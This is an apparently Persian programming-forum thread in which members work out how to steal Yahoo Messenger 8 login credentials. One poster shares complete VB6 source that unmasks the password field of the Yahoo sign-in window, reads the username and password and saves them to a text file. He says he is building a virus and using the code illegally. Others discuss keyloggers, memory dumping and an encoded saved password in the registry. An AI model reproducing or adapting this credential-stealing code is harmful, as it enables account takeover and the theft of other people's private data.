:تشویق:دلیل هک نشدن یاهو 8 به بعد هش شدن( ذخیره در حافظه موقت ) است که
من با کمی هماهنگی بین برنامه یاهو از زمان باز شدن و تا لوگین شدن تونستم پسورد ایدی لوگین شده رو بزنم اما میخوام بیشتر اینو گسترش بدم از شما دوستان عزیز هم تقاضای همکاری دارم اینم نمونه کار این برنامه هست

سلام آقا این برنامه شما چه جوری کار می کنه اصلا چی هست؟

این که keylogger بود!

سلام دوست عزیز حتی اگه کمک هم بخوای باید یه کم توضیح بدی نه همین توری مطلب را بگی و بری ، توضیح بده!!!!!!!

دوست عزیز اولا بهتره که یا نمونه ی برنامه رو اینجا بزاری یا یه توضیح کامل بدی . در ضمن بهترین و جواب گو ترین راه برای این کار Read Memory هست برنامه های آماده ی زیادی وجود دارد و بهترین آن Art Money هست . بهتره از روشت یه توضیح کامل بدی .


باتشکر احسان

دوست عزیز اولا بهتره که یا نمونه ی برنامه رو اینجا بزاری یا یه توضیح کامل بدی . در ضمن بهترین و جواب گو ترین راه برای این کار Read Memory هست برنامه های آماده ی زیادی وجود دارد و بهترین آن Art Money هست . بهتره از روشت یه توضیح کامل بدی .


باتشکر احسان


آقا حسان میشه این روش Read Memory را اگر خودت بلد هستی بیشتر توضیح بدی راستی این برنامه که من نوشتم یک نوع کیلوگر هست اما هوشمند و خیلی سریع و دقیق
اگر کسی نمونه برنامه ردباره Read Memory داره بگه تا شاید با کمک هم بتونیم دخل یاهو 8 رو بیاریم

آقا حسان میشه این روش Read Memory را اگر خودت بلد هستی بیشتر توضیح بدی راستی این برنامه که من نوشتم یک نوع کیلوگر هست اما هوشمند و خیلی سریع و دقیق
اگر کسی نمونه برنامه ردباره Read Memory داره بگه تا شاید با کمک هم بتونیم دخل یاهو 8 رو بیاریم
ببین دوست عزیز من در حال نوشتن ویروس هستم و یکی از آپشن های این ویروس اینه که تمام اد لیست یاهو رو در میاره . من هرکاری کردم نتونستم با Send Message به ListView که در آن ادلیست هست بتونم محتوا رو بدست بیارم مجبور شدم از راه Read Memory استفاده کنم . این روش دقیقا تنها روشی هست که تمام Trainer نوسان از آن استفاده می کنند .

با عرض پوزش چون من از این برنامه دارم استفاده های غیرقانونی می کنم نی تونم در اینجا قرار دهم .

باتشکر احسان

استفاده ازKeyLogger ، کم هزینه ترین و سریع ترین روش هست .

خوب نگفتی دقیقا چی میخوای

اول منظورت رو بفهمون و توضیح بده بعد تقاضای کمک کن ئوست عزیز

من می خوام بدونم چی جوری میشه فایل pagefile رو کرک کرد یا بهتر بگم اطلاعات درونش رو دید فکر کنم این همان اطلاعات حافظه موقت یاشه - لطفا هر کس بلده بهم کمک کنه

من می خوام بدونم چی جوری میشه فایل pagefile رو کرک کرد یا بهتر بگم اطلاعات درونش رو دید فکر کنم این همان اطلاعات حافظه موقت یاشه - لطفا هر کس بلده بهم کمک کنه

دوست عزیز احتیاج به این کارا نیست به خدا :گریه::گریه::گریه::گریه: بابا شما در GoOgle به دنبال عبارت Read Memory VB بگرد ببین چقدر مطلب برای شما میاره من به خدا دمه دست ندارم وگرنه واست سورس می زاشتم .

باتشکر احسان

:تشویق:دلیل هک نشدن یاهو 8 به بعد هش شدن( ذخیره در حافظه موقت ) است که
من با کمی هماهنگی بین برنامه یاهو از زمان باز شدن و تا لوگین شدن تونستم پسورد ایدی لوگین شده رو بزنم اما میخوام بیشتر اینو گسترش بدم از شما دوستان عزیز هم تقاضای همکاری دارم اینم نمونه کار این برنامه هست

سلام.

با یه کی لاگر ساده که با چند خط نوشته می شه ، می تونید خیلی راحت و مطمئن این کار رو انجام بدین ، نیازی هم به این کارا نیست .

چرا شما مشکل ترین راه رو انتخاب می کنید .

سلام.

با یه کی لاگر ساده که با چند خط نوشته می شه ، می تونید خیلی راحت و مطمئن این کار رو انجام بدین ، نیازی هم به این کارا نیست .

چرا شما مشکل ترین راه رو انتخاب می کنید .
اگه میشه شما آسونترین راه رو بیان کنید . ممنون

سلام.

با یه کی لاگر ساده که با چند خط نوشته می شه ، می تونید خیلی راحت و مطمئن این کار رو انجام بدین ، نیازی هم به این کارا نیست .

چرا شما مشکل ترین راه رو انتخاب می کنید .

دوست عزیز با یه سوال شروع می کنم : آیا شما می تونید با کی لاگر کاری کنی که محتوای Listview که ادد لیست داخلش هست رو بدست بیاری ؟ این کار با API امکان پذیر هست که تا اینجایی که من اطلاع دارم و دیدم رویه SP2 جواب نمی ده . خوب پس ما باید از Mempry در بیاریم . خوب پس اینم می دونیم که تمام اطلاعات که در کامپیوتر رد و بدل می شه از داخل Memory رد می شه . پس قطعی ترین راه همین روش هست و کی لاگر روش های جزئی هست . پس بهتر از همین الان هممون بریم سراغ روش های سخت و لی دقیق یا حتی راحت و بازهم دقیق .

دوستان اینم سورس مربوط به دریافت پسورد :

این بخش در Module باشد .



'=======================
'Public Declare For ApP=
'=======================
'================================================= ================================================== ================================================== ==========================
Public Declare Function FindWindow _
Lib "user32" _
Alias "FindWindowA" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long

Public Declare Function PostMessage _
Lib "user32" _
Alias "PostMessageA" (ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
ByVal lParam As Long) As Long

Public Declare Function SendMessage _
Lib "user32" _
Alias "SendMessageA" (ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
ByVal lParam As Any) As Long

Public Declare Function FindWindowEx _
Lib "user32" _
Alias "FindWindowExA" (ByVal hWnd1 As Long, _
ByVal hWnd2 As Long, _
ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long

Private Declare Function Sendmessagebynum& _
Lib "user32" _
Alias "SendMessageA" (ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
ByVal lParam As Long)

Private Declare Function SendMessageByString& _
Lib "user32" _
Alias "SendMessageA" (ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
ByVal lParam As String)

Private Declare Function GetWindow& Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long)

'================================================= ================================================== ================================================== ==========================

'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Public Const VK_END = &H23

Public Const VK_HOME = &H24

Public Const VK_SHIFT = &H10

Public Const WM_SETTEXT = &HC

Public Const WM_GETTEXT = &HD

Private Const EM_SETPASSWORDCHAR = &HCC

Private Const EM_GETPASSWORDCHAR = &HD2

Private Const GW_HWNDNEXT = 2

Public Const WM_GETTEXTLENGTH = &HE

Public user As String

Public pass As String

Public Function GetText(hwnd) As String

On Error Resume Next

nRet = SendMessage(hwnd, EM_GETPASSWORDCHAR, 0&, 0&)

If nRet <> 0 Then
'agar nRet<>0 bashad yani text box passworde
'* ro az roye text box barmidarim
PostMessage hwnd, EM_SETPASSWORDCHAR, 0&, 0&
End If

GetTrim = Sendmessagebynum(hwnd, 14, 0&, 0&)
TrimSpace$ = Space$(GetTrim)
GetString = SendMessageByString(hwnd, 13, GetTrim + 1, TrimSpace$)

If nRet <> 0 Then
'dobare * ro roye password mizarim
PostMessage hwnd, EM_SETPASSWORDCHAR, Asc("*"), 0&
End If

GetText = TrimSpace$
End Function

Public Function GetYahoo()

On Error Resume Next

Dim Hndl As Long

Dim txt As String

Hndl = FindWindow(vbNullString, "&Sign In")

If Hndl <> 0 Then
nh = FindWindowEx(Hndl, 0, vbNullString, vbNullString)
Hndl = GetWindow&(nh, GW_HWNDNEXT)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
user = GetText(Hndl)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
txt = GetText(Hndl)
txt = Trim(Replace(txt, Chr(0), ""))

If txt <> "" And txtPass <> txt Then pass = txt
End If

Hndl = FindWindow(vbNullString, "Yahoo! Messenger")

If Hndl <> 0 Then
nh = FindWindowEx(Hndl, 0, vbNullString, vbNullString)

If GetText(nh) = "YLoginWnd" Then 'Y!8
Hndl = FindWindowEx(nh, 0, vbNullString, vbNullString)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
user = GetText(Hndl)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
Hndl = GetWindow&(Hndl, GW_HWNDNEXT)
txt = GetText(Hndl)
txt = Trim(Replace(txt, Chr(0), ""))

If txt <> "" And txtPass <> txt Then pass = txt
End If
End If

Open "C:\aaa.txt" For Output As #1
Print #1, "USer: " & user & " Pass: " & pass
Close #1
End Function



سورس اصلی برنامه :

احتیاجات : Timer1.interval=10 - timer1.enabled=true




Private Sub Timer1_Timer()
GetYahoo
End Sub


باتشکر احسان

میشه یکم بیشتر توضیح بدی؟!؟

میشه یکم بیشتر توضیح بدی؟!؟

کد های بالا رو طبق دستور انجام بده و سپس وقتی آیدی رو وارد کردی و Login رو زدی برو به C:\aaa.txt این آدرس .



باتشکر احسان

جالب بود.
نمیخوای چگونگی زدن اد لیستا رو بگی(پیغام خصوصی هم قبوله)

جالب بود.
نمیخوای چگونگی زدن اد لیستا رو بگی(پیغام خصوصی هم قبوله)

دوست عزیز به خدا قصد ناراحتی شما رو ندارم ولی واقعا از این سورس که نوشتم برای استفاده در ویروس خودم استفاده می کنم و هنوز Public نکردم و Priv8 هست . ولی برای اینکه بین دوستان سوء تفاهم پیش نیاد فردا واستون یه عکس می دم و اگر کسی خواست می تونم فقط EXE رو بدم .


باتشکر احسان

بله جالب بود. اما تغيير توپي ها به کاراکتر * رو ميخواين چه کار ميکنين؟
Memory Dump که فعلا در مورد ياهو 8 و 9 جواب نميده. چون اطلاعات داخل Memory کد شده هستن و فعلا کسي نتونسته Offset مربوط به پسورد رو بدست بياره.
CodeInjection هم که توپي هاي پسورد رو عوض ميکنه و قضيه لو ميره.
ميمونه KeyLogger که اونم ضعف هايي داره. مثلا فرض کنين متني نوشته ميشه؛ قسمتي از اون Select ميشه (با موس) و فقط يکبار کليد BackSpace زده ميشه. در اين صورت حدث زدن اطلاعات کار سختيه!!!

سلام .


اگه میشه شما آسونترین راه رو بیان کنید . ممنون

گفتم که ! واسه بدست آوردن یوزر و پسورد از کی لاگر استفاده کنید.


دوست عزیز با یه سوال شروع می کنم : آیا شما می تونید با کی لاگر کاری کنی که محتوای Listview که ادد لیست داخلش هست رو بدست بیاری ؟...... .
به نظر می یاد من منظور ایشون رو از گسترش برنامه نفهمیدم . ولی حتما شما کی لاگر های جدیدی که طراحی می شن رو ملاحضه کردید !!!!!!!! دیگه فقط ثبت کلید های زده شده رو بر عهده ندارند به قول شما روی Memory هم مدیریت دارند . مثلا وقتی که با فردی چت می کنید علاوه بر متن تایپ شده شما ، متن فرستاده شده توسط فرد مقابل رو هم ذخیره می کنه !
یا اینکه تمام پسورد هایی که در حافظه ذخیره شدند رو ثبت می کنه .

بله جالب بود. اما تغيير توپي ها به کاراکتر * رو ميخواين چه کار ميکنين؟
Memory Dump که فعلا در مورد ياهو 8 و 9 جواب نميده. چون اطلاعات داخل Memory کد شده هستن و فعلا کسي نتونسته Offset مربوط به پسورد رو بدست بياره.
CodeInjection هم که توپي هاي پسورد رو عوض ميکنه و قضيه لو ميره.
ميمونه KeyLogger که اونم ضعف هايي داره. مثلا فرض کنين متني نوشته ميشه؛ قسمتي از اون Select ميشه (با موس) و فقط يکبار کليد BackSpace زده ميشه. در اين صورت حدث زدن اطلاعات کار سختيه!!!

دوست عزیز من دارم این روش رو روی ورژن 8 چک می کنم و تا الان 100 درصد جواب داده شما تست نکرده می گید کار نمی کنه ؟


باتشکر احسان

عزيزم منظور شما چيه؟ کدوم روش رو ميگين؟ منظور من Dump Yahoo! Pass From Memory هست.
من که به شخصه هنوز نتونستم Offset مربوت به پسورد رو تو Yahoo 8.0 & 9.0 بدست بيارم.
اما اگه شما ميتونين با Read Memory يا همون Memory Dump پسورد رو از Y!M بکشيد بيرون؛ لطفا يه Exe Demo برامون Upload کنين. ممنون ميشم دوست عزيز.
البته Source نخواستم. فقط يه Demo کامپايل شده.

من از روشی که دوستمون احسان گفت روی یاهو8 امتحان کردم.
کار میکنه.حالا یه سوال داشتم چطور میشه تشخیص داد که کاربر کلید Sign In رو فشار داده که دیگه فعالیت تایمر قطع بشه

من از روشی که دوستمون احسان گفت روی یاهو8 امتحان کردم.
کار میکنه.حالا یه سوال داشتم چطور میشه تشخیص داد که کاربر کلید Sign In رو فشار داده که دیگه فعالیت تایمر قطع بشه

کاری نداره Handel دکمه ی Sign In رو بر اساس نام دکمه پیدا کنید و هرموقع هندل 0 شد تایمر قطع شه . می تونید با FindWindow

Hndl = FindWindow(vbNullString, "&Sign In")

هر موقع مقدار Hndl =0 شد تایمر قطع بشه .



باتشکر احسان

میشه یه پروژه ضمیمه کنید

KeihanCPU عزیز شما میتونین از هندل استفاده کنید یعنی وقتی هندل تو تکست پسورد هست که یه هندل مخصوص خودش داره تایمر فعال باشه و وقتی خارج شد تایمر غیر فعال بشه.
موفق باشید

لطفا یک پروژه ضمیمه کنید

لطفا یک پروژه ضمیمه کنید

دوست عزیز اینم نمونه برای شما .


باتشکر احسان

ممنون از همکاریتون میشه یه توضیح مختصر درباره کدها بدید

ممنون از همکاریتون میشه یه توضیح مختصر درباره کدها بدید

دوست عزیز دقیقا ببین کجا رو متوجه نمی شی کد اون قسمت رو بزار واست توضیح می دم :قلب::قلب::قلب:



باتشکر احسان

چند خط بیشتر نبود


MainClass = FindWindow("YahooBuddyMain", vbNullString)
ChildClass = FindWindowEx(MainClass, 0&, "#32770", vbNullString)
ChildClass = FindWindowEx(ChildClass, 0&, "Button", "&Sign In")


لطفا کامل توضیح بدین(البته با عرض پوزش)

سلام
دوست عزیز شما می تونید از طریق رجیستری پسورد ذخیره شده رو در بیارید البته من هنوز دارم روش کار میکنم شما اگه به مسیر زیر برید HKEY_CURRENT_USER\Software\yahoo\pager
در قسمت سمت راست یک متغیر با نام ETS که توش یک چیز هایی نوشته شده که به صورت کد در اومده شما می تونید با تغییر دادن پسورد خودتون شاهد دیدن تغییر کردن این قسمت باشید. من هنوز در حال بررسی هستم امید وارم این پروژه رمو به پایان بروسونم البته شما هم می تونید با کمی حوصله و ور رفتن با این قسمت پسورد رو کش برید البته فقط یه چیزی اگه پیدا کردید حتما بزارید تو سایت تا دوستان دیگه بتونند از این سورس لذت ببرند.:لبخندساده:

چند خط بیشتر نبود


MainClass = FindWindow("YahooBuddyMain", vbNullString)
ChildClass = FindWindowEx(MainClass, 0&, "#32770", vbNullString)
ChildClass = FindWindowEx(ChildClass, 0&, "Button", "&Sign In")
لطفا کامل توضیح بدین(البته با عرض پوزش)

اینم تقدیم به شما دوست عزیز


'گرفتن هندل پنجره ي اصلي که همان پنجره ياهو
MainClass = FindWindow("YahooBuddyMain", vbNullString)
'گرفتن هندل لايه ي زيرين صفحه اصلي ياهو . همان صفحه اي که زير منو وجود دارد
ChildClass = FindWindowEx(MainClass, 0&, "#32770", vbNullString)
'گرفتن عندل دکمه مورد نظر بر طبق نام کپشن دکمه
ChildClass = FindWindowEx(ChildClass, 0&, "Button", "&Sign In")

باتشکر احسان

سلام
دوست عزیز شما می تونید از طریق رجیستری پسورد ذخیره شده رو در بیارید البته من هنوز دارم روش کار میکنم شما اگه به مسیر زیر برید HKEY_CURRENT_USER\Software\yahoo\pager
در قسمت سمت راست یک متغیر با نام ETS که توش یک چیز هایی نوشته شده که به صورت کد در اومده شما می تونید با تغییر دادن پسورد خودتون شاهد دیدن تغییر کردن این قسمت باشید. من هنوز در حال بررسی هستم امید وارم این پروژه رمو به پایان بروسونم البته شما هم می تونید با کمی حوصله و ور رفتن با این قسمت پسورد رو کش برید البته فقط یه چیزی اگه پیدا کردید حتما بزارید تو سایت تا دوستان دیگه بتونند از این سورس لذت ببرند.:لبخندساده:

دوست عزیز وقتی از این راه به سادگی می شه استفاده کرد چرا از راهی بریم که جواب راه حل رو نمی دونیم ؟

من همیشه بر این باورم که باید دنبال اصلی ترین راه بریم گرچه آسان باشد یا شایدم سخت .


باتشکر احسان

دوست عزیز وقتی از این راه به سادگی می شه استفاده کرد چرا از راهی بریم که جواب راه حل رو نمی دونیم ؟

من همیشه بر این باورم که باید دنبال اصلی ترین راه بریم گرچه آسان باشد یا شایدم سخت .


باتشکر احسان



شما موفق به خواندن و دیکد کردن اطلاعات رم شدید؟

شما موفق به خواندن و دیکد کردن اطلاعات رم شدید؟

منظورتون در آوردن کد کدام اطلاعات هست ؟‌


باتشکر احسان

منظورتون در آوردن کد کدام اطلاعات هست ؟‌


باتشکر احسان


همون اطلاعاتی که هر برنامه در حال اجرا در حافظه موقت یا در کل بشه اظلاعات درون pagfile رو دید

حالا نمیشه همینارو برای C# هم توضیح بدین ؟

حالا نمیشه همینارو برای C# هم توضیح بدین ؟

من چون C# كار نكردم اطلاعي ندارم:لبخندساده:

با سلام به همه دوستان
بازم خوشحالم که چنین بحثهایی رو شما در این تالار می تونید مطرح کنید والا نمیدونم ما دلفی کارا چه گناهی کردیم که اگه اسم پاک کردن فایل بیاد یا فرمت کردن درایو شستا اطلاعیه و تذکر روانه کنترل پنلمون میشه و تهدید های زیادی اعم از پاک کردن شما و ... اما والا ما به مدیران محترم این سایت واقعا احترام میزاریم و قوانین خوب این سایت رو هم دوست داریم هم اجرا می کنیم.
اما ایکاش مدیران عزیزی چون جناب کشاورز یک مقدار در تالار دلفی هم مثل شما دست ما رو باز می زاشتند تا سوالاتمون رو بتونیم بپرسم.باز هم شرمنده از همه دوستان....

با سلام به همه دوستان
بازم خوشحالم که چنین بحثهایی رو شما در این تالار می تونید مطرح کنید والا نمیدونم ما دلفی کارا چه گناهی کردیم که اگه اسم پاک کردن فایل بیاد یا فرمت کردن درایو شستا اطلاعیه و تذکر روانه کنترل پنلمون میشه و تهدید های زیادی اعم از پاک کردن شما و ... اما والا ما به مدیران محترم این سایت واقعا احترام میزاریم و قوانین خوب این سایت رو هم دوست داریم هم اجرا می کنیم.
اما ایکاش مدیران عزیزی چون جناب کشاورز یک مقدار در تالار دلفی هم مثل شما دست ما رو باز می زاشتند تا سوالاتمون رو بتونیم بپرسم.باز هم شرمنده از همه دوستان....

دوست عزيز تمام مطالبي كه در اين تالار مطرح ميشه صرفا جهت يادگيري بيشتر هستش و اينكه كاربر از اين علم و اطلاعات چگونه استفاده كنه به عهده خودش هست
منم از اينجا از مديران اين تالار به خاطر همكاري لازم با دوستان كمال تشكر و قدراني رو دارم

برای تبدیل به #C از لینک زیر استفاده کنید
http://labs.developerfusion.co.uk/convert/vb-to-csharp.aspx

سلام
من طبق دستورات شما انجام دادم اما فایل تکس خالی و چیزی داخلش نمیاد

مشکل کجاست؟

اره منم هر کاری کردم فایل Text خالی میماند

دوستان شما از کد من استفاده کردین ؟


آیا نتیجه از کد من نگرفتین ؟





باتشکر احسان

اقا احسان من یه سوال داشتم چه جوری می تونم دکمه ای در یک پنجره رو کلیک کنم با این کد میشه فکنم


ChildClass = FindWindowEx(ChildClass, 0&, "Yes", "Internet")

فقط اگه میشه یکم توضیح بدین

اگه میشه به این تایپک یه سر بزنید :
http://barnamenevis.org/forum/showthread.php?t=141889